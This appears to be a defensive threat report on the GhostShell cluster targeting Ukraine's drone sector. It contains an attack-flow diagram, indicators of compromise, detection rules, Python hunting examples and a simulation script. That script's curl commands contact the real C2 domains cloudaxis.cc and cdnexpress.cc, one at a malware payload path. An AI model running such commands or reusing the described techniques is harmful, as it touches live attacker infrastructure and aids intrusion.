GhostShell (MB-0009): Targeting Ukraine’s UAV Operations and Defense Supply Chain
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A newly tracked threat cluster known as GhostShell is targeting Ukraine’s UAV and broader drone ecosystem. The operation uses advanced malware, including mTLS-authenticated implants and memory-resident loaders. To gain initial access, the attackers rely on decoy documents that impersonate a Ukrainian drone company.
Investigation
The analyst uncovered a multi-stage intrusion chain built around VBS scripts, mTLS-enabled implants such as 122.exe, and Telegram-based loaders including update.exe. Reverse engineering exposed custom XOR decryption logic, an embedded private PKI, and use of Xray Core for covert tunneling. The investigation also identified Vidar infostealer activity within the same infrastructure.
Mitigation
Organizations should enforce strict mTLS certificate validation and monitor for unauthorized use of client certificates. Endpoint visibility should be improved to detect in-memory loading, ntdll.dll unhooking, and suspicious changes to Windows Run key persistence. Teams should also watch for abnormal outbound traffic to known command-and-control domains and Telegram-driven configuration retrieval.
Response
Affected systems should be isolated immediately, followed by memory forensics to identify any in-memory implants. Network logs should be reviewed for traffic involving cloudaxis.cc and cdnexpress.cc. Security teams should also hunt for the referenced SHA-256 hashes and monitor for the specific mTLS client certificate CN=ed6e62814295701f.
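The hunting steps listed under Mitigation and Response can be expressed as one pass over endpoint and network telemetry. The following is an added example written for this page, not the platform's own detection content: the event schema (a dict with a "type" field and per-type keys such as path, key, dest_host, query, subject and sha256) and the Telegram host list are assumptions, the domains and the mTLS client certificate CN are the ones quoted above, and the SHA-256 set is a placeholder to be filled from the report. The sample events are constructed.

```python
"""Hunt for the GhostShell indicators named in the Mitigation and Response
sections over endpoint and network telemetry.

Added example, not the platform's detection content.  The event schema and
TELEGRAM_HOSTS are assumptions; C2_DOMAINS and MTLS_CLIENT_CN come from the
write-up; KNOWN_SHA256 is a placeholder to be populated from the report.
"""
import re

C2_DOMAINS = {"cloudaxis.cc", "cdnexpress.cc"}      # from the write-up
MTLS_CLIENT_CN = "ed6e62814295701f"                   # from the write-up
KNOWN_SHA256 = {"<sha256-from-report>"}               # placeholder: fill from the report
TELEGRAM_HOSTS = {"api.telegram.org", "t.me"}         # assumption: Bot API hosts

# Run / RunOnce keys under any hive prefix (HKCU\Software\..., HKLM\SOFTWARE\...).
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
# Script or binary dropped into a per-user or the common Startup folder.
STARTUP_ITEM_RE = re.compile(
    r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(vbs|vbe|js|jse|wsf|bat|cmd|exe|lnk)$", re.I)


def subject_cn(subject: str) -> str:
    """Return the CN attribute of an RFC 4514-style subject string, or ''."""
    for rdn in subject.split(","):
        attr, _, value = rdn.strip().partition("=")
        if attr.strip().upper() == "CN":
            return value.strip()
    return ""


def hunt(events):
    """Return (rule_name, evidence) for every event matching a GhostShell indicator."""
    hits = []
    for ev in events:
        kind = ev.get("type")
        if kind == "file_event" and STARTUP_ITEM_RE.search(ev.get("path", "")):
            hits.append(("startup_folder_persistence", ev["path"]))
        elif kind == "registry_set" and RUN_KEY_RE.search(ev.get("key", "")):
            hits.append(("run_key_persistence", ev["key"]))
        elif kind == "network_connection" and ev.get("dest_host", "").lower() in C2_DOMAINS:
            hits.append(("ghostshell_c2_domain", ev["dest_host"]))
        elif kind == "dns_query" and ev.get("query", "").lower() in TELEGRAM_HOSTS:
            hits.append(("telegram_c2_channel", ev["query"]))
        elif kind == "tls_client_cert" and subject_cn(ev.get("subject", "")) == MTLS_CLIENT_CN:
            hits.append(("ghostshell_mtls_client_cert", ev["subject"]))
        elif kind == "process_creation" and ev.get("sha256", "").lower() in KNOWN_SHA256:
            hits.append(("ghostshell_known_hash", ev.get("image", "")))
    return hits


# Constructed sample telemetry (not real logs): one true positive per indicator
# plus benign events that must not fire.
SAMPLE_EVENTS = [
    {"type": "file_event",
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"},
    {"type": "file_event", "path": r"C:\Users\alice\Documents\report.docx"},
    {"type": "registry_set",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cdn",
     "value": r"C:\Users\alice\AppData\Local\Temp\122.exe"},
    {"type": "network_connection", "dest_host": "cloudaxis.cc", "dest_port": 443},
    {"type": "network_connection", "dest_host": "update.microsoft.com", "dest_port": 443},
    {"type": "dns_query", "query": "api.telegram.org"},
    {"type": "dns_query", "query": "www.example.com"},
    {"type": "tls_client_cert", "subject": "CN=ed6e62814295701f", "dest_host": "cdnexpress.cc"},
    {"type": "tls_client_cert", "subject": "CN=alice-laptop, O=Corp"},
    {"type": "process_creation", "image": r"C:\Users\alice\AppData\Local\Temp\22.exe",
     "sha256": "<sha256-from-report>"},
]

if __name__ == "__main__":
    for rule, evidence in hunt(SAMPLE_EVENTS):
        print(f"{rule:32} {evidence}")
```

The client certificate CN is matched on the parsed subject rather than on a substring, so a CN that merely contains the value in another attribute does not fire; the in-memory loading and ntdll.dll unhooking named in Mitigation leave no record in this kind of event stream and still need memory forensics or an EDR with hook-integrity telemetry.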
```mermaid
graph TB
%% Class Definitions Section
classDef action fill:#99ccff
classDef tool fill:#cccccc
classDef malware fill:#ff9999
classDef process fill:#ccffcc
classDef network fill:#ffff99
classDef operator fill:#ff9900
%% Initial Access and Execution Phase
action_phishing["<b>Action</b> – <b>T1566.001 Phishing: Spearphishing Attachment</b><br/>Description: Social engineering using decoy PDF documents<br/>impersonating Besomar to target UAV ecosystem."]
class action_phishing action
action_exploit["<b>Action</b> – <b>T1203 Exploitation for Client Execution</b><br/>Description: Exploiting CVE-2025-8088 and CVE-2025-6218<br/>via malicious archive Besomar_documentation.rar."]
class action_exploit action
process_vbs["<b>Process</b> – <b>T1059.005 Command and Scripting Interpreter: Visual Basic</b><br/>Description: VBS file dropped into Windows Startup folder<br/>executing Base64-encoded strings via ExecuteGlobal."]
class process_vbs process
%% Persistence and Payload Download
action_persistence_startup["<b>Action</b> – <b>T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</b><br/>Description: VBS file placed in Startup folder for persistence."]
class action_persistence_startup action
network_download["<b>Network</b> – <b>T1105 Ingress Tool Transfer</b><br/>Description: Downloading secondary payloads from cloudaxis.cc."]
class network_download network
op_branch(("AND"))
class op_branch operator
%% Path 1: 122.exe
malware_122["<b/>Name: 122.exe<br/>Description: Loader that decrypts an embedded PE using XOR<br/>and executes it in memory."]
class malware_122 malware
action_fingerprint["<b/>Action: Host Fingerprinting<br/>Description: Collecting computer name, username, and PID."]
class action_fingerprint action
network_c2_122["<b/>C2 Communication: cdnexpress.cc<br/>Description: Uses unique mTLS client certificate for authentication."]
class network_c2_122 network
action_screen_cap["<b/>Action: Screen Capture<br/>Description: Capturing screens via GDI+."]
class action_screen_cap action
action_persistence_reg["<b/>Action: Registry Run Keys<br/>Description: Establishing persistence via Windows Registry Run keys."]
class action_persistence_reg action
%% Path 2: update.exe
malware_update["<b/>Name: update.exe<br/>Description: In-memory loader retrieving C2 config from Telegram."]
class malware_update malware
action_anti_analysis["<b/>Action: <b>T1562.001 Impair Defenses: Disable or Modify Tools</b><br/>Description: Unhooking EDR/monitoring tools by patching ntdll.dll."]
class action_anti_analysis action
action_metasploit_stager["<b/>Action: <b>T1059.003 Command and Scripting Interpreter: Windows Command Shell</b><br/>Description: Executes a Metasploit-style HTTPS stager in memory."]
class action_metasploit_stager action
%% Path 3: 22.exe and Vidar
malware_22["<b/>Name: 22.exe<br/>Description: Multi-stage launcher utilizing Xray Core client."]
class malware_22 malware
network_vless["<b/>Network: <b>T1573 Encrypted Channel</b><br/>Description: Tunneling traffic via a VLESS connection."]
class network_vless network
malware_vidar["<b/>Name: Vidar Malware<br/>Description: Credential and data theft tool targeting browser<br/>passwords, cookies, wallets, and messaging artifacts."]
class malware_vidar malware
%% Connection Logic
action_phishing -->|leads_to| action_exploit
action_exploit -->|results_in| process_vbs
process_vbs -->|uses| action_persistence_startup
action_persistence_startup -->|triggers| network_download
network_download -->|delivers| op_branch
%% Branching to payloads
op_branch -->|payload_1| malware_122
op_branch -->|payload_2| malware_update
op_branch -->|payload_3| malware_22
%% 122.exe flow
malware_122 -->|performs| action_fingerprint
malware_122 -->|communicates_with| network_c2_122
malware_122 -->|capable_of| action_screen_cap
malware_122 -->|ensures| action_persistence_reg
%% update.exe flow
malware_update -->|retrieves_config_from| action_anti_analysis
action_anti_analysis -->|executes| action_metasploit_stager
%% 22.exe flow
malware_22 -->|tunnels_via| network_vless
network_vless -->|deploys| malware_vidar
```
Attack Flow
Detections
- Short File Name (via cmdline)
- LOLBAS WScript / CScript (via process_creation)
- Suspicious CURL Usage (via cmdline)
- Suspicious Binary / Scripts in Autostart Location (via file_event)
- Possible Telegram Abuse As Command And Control Channel (via dns_query)
- Possible CVE-2025-8088 / CVE-2025-6218 (WinRAR Vulnerability) Exploitation Attempt (via file_event)
- Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
- Detect Communication and Payload Download from GhostShell Infrastructure [Windows Network Connection]
- GhostShell Malware Persistence via Startup Folder [Windows File Event]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
- Attack Narrative & Commands: The adversary has gained an initial foothold and is attempting to pull down a specialized payload (122.exe) to solidify control over the target. To maintain a low profile, the malware uses a hijacked or seemingly legitimate-looking CDN domain (cloudaxis.cc). Following the download, the malware attempts to “heartbeat” or send telemetry back to the C2 infrastructure via a specific analytics endpoint (cdnexpress.cc/analytics). The simulation will use curl to mimic these specific GET requests to trigger the URI-based detection logic.
- Regression Test Script:

```powershell
# Simulation of GhostShell Payload Download
Write-Host "[+] Simulating GhostShell Payload Download..."
curl.exe -I "https://cloudaxis.cc/gsmft/yueu/fkvqld/tvqqwh/122.exe"

# Simulation of GhostShell C2 Communication (Analytics)
Write-Host "[+] Simulating GhostShell C2 Communication..."
curl.exe -I "https://cdnexpress.cc/analytics"
```

- Cleanup Commands:

```powershell
# No files are actually downloaded in this simulation (using -I for headers only)
# No persistent changes are made to the system.
Write-Host "[+] Simulation complete. No cleanup required."
```
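To confirm that the regression script would actually exercise the URI-based rule, the requests it generates can be replayed through the detection logic offline. The following is an added example written for this page, not the platform's rule: it assumes a TLS-inspecting forward proxy that logs the absolute URL in Common Log Format, the log lines are constructed, and the domains and paths are the ones from the narrative above. One caveat the script makes visible: `curl.exe -I` issues HEAD requests, not GET, so a rule keyed on the GET method would never fire on this regression test; the example therefore matches on host and path only.

```python
"""Replay the regression script's requests through a URI-based GhostShell rule.

Added example, not the platform's rule.  Assumes a TLS-inspecting forward
proxy logging the absolute URL in Common Log Format; SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import urlsplit

C2_DOMAINS = {"cloudaxis.cc", "cdnexpress.cc"}   # from the write-up
PAYLOAD_NAME_RE = re.compile(r"/122\.exe$", re.I)  # payload name from the write-up
ANALYTICS_PATH = "/analytics"                      # C2 endpoint from the write-up

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ua>[^"]*)"$'
)


def parse_line(line: str):
    """Parse one proxy log line into a dict, or return None if it is malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: dict):
    """Return the rule name an entry triggers, or None for benign traffic.

    The HTTP method is deliberately ignored: `curl -I` sends HEAD, so a rule
    keyed on GET would miss both the regression test and a real HEAD probe.
    """
    parts = urlsplit(entry["url"])
    host = (parts.hostname or "").lower()
    if host not in C2_DOMAINS:
        return None
    if PAYLOAD_NAME_RE.search(parts.path):
        return "ghostshell_payload_download"
    if parts.path == ANALYTICS_PATH:
        return "ghostshell_c2_analytics_beacon"
    return "ghostshell_infrastructure_contact"


def detect(lines):
    """Run the rule over raw log lines; return (rule, method, url, src) hits."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # skip unparseable lines instead of aborting the whole batch
        rule = classify(entry)
        if rule:
            hits.append((rule, entry["method"], entry["url"], entry["src"]))
    return hits


# Constructed log lines: the two HEAD requests the regression script issues,
# one benign request, one POST beacon to the same endpoint, and one malformed line.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2025:12:00:01 +0000] "HEAD https://cloudaxis.cc/gsmft/yueu/fkvqld/tvqqwh/122.exe HTTP/1.1" 404 0 "curl/8.4.0"',
    '10.0.0.5 - - [01/Jan/2025:12:00:02 +0000] "HEAD https://cdnexpress.cc/analytics HTTP/1.1" 200 0 "curl/8.4.0"',
    '10.0.0.7 - - [01/Jan/2025:12:00:03 +0000] "GET https://www.example.com/index.html HTTP/1.1" 200 512 "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2025:12:00:04 +0000] "POST https://cdnexpress.cc/analytics HTTP/1.1" 200 17 "-"',
    'not a log line',
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit)
```

Matching on the parsed hostname rather than on a substring of the URL avoids false positives from look-alike domains such as a host that merely contains "cloudaxis.cc" in its path or query string.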